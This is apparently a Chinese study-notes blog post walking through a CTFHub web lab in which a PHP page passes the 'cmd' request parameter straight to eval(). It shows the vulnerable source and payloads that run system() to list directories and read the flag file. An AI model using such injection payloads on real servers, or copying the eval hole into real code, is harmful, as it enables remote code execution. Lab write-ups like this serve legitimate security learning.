CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
fox_lht15 小时前
14.6.将错误重定向到标准错误
开发语言·后端·学习·rust
fanged15 小时前
Linux内核学习17--SPI子系统(TODO)
学习
The moon forgets16 小时前
跨本体机器人学习:人类运动解码通用物理交互
学习·机器人·交互·具身智能·vla
wzg19690226wzg16 小时前
rust 学习 泛型
开发语言·学习·rust
舟遥遥娓飘飘17 小时前
文稿起草系统,离线学习写作人的“思维 + 风格“,按学到的特征起草新文稿,再用反馈闭环持续提升
windows·学习
踏着七彩祥云的小丑17 小时前
Go学习第5天:变量作用域 + 数组 + 指针
开发语言·学习·golang·go
MartinYeung517 小时前
[论文学习]针对 LLM 的间接提示注入攻击用于高效隐私洩露之深度分析
人工智能·学习
AI棒棒牛18 小时前
YOLO26 全网独家改进创新: MIT 2025 振荡状态空间模型:引入可学习的阻尼机制,独家创新!
人工智能·学习·目标检测·计算机视觉·yolo26
留白_18 小时前
pandas进阶学习
学习·pandas
_Evan_Yao18 小时前
递归函数入门:以阶乘和斐波那契数列为例
python·学习·算法
热门推荐
01《置身钉内》原文-可播放阅读02HTTP 与 HTTPS 的区别:从原理到实战详解03Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析04【AI】2026 年具身智能模型和世界模型总结05GitHub 镜像站点06AI科技热点日报 | 2026年6月1日072026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?082026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?09Codex 下载安装指南:Windows 和 macOS 官方版下载102026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf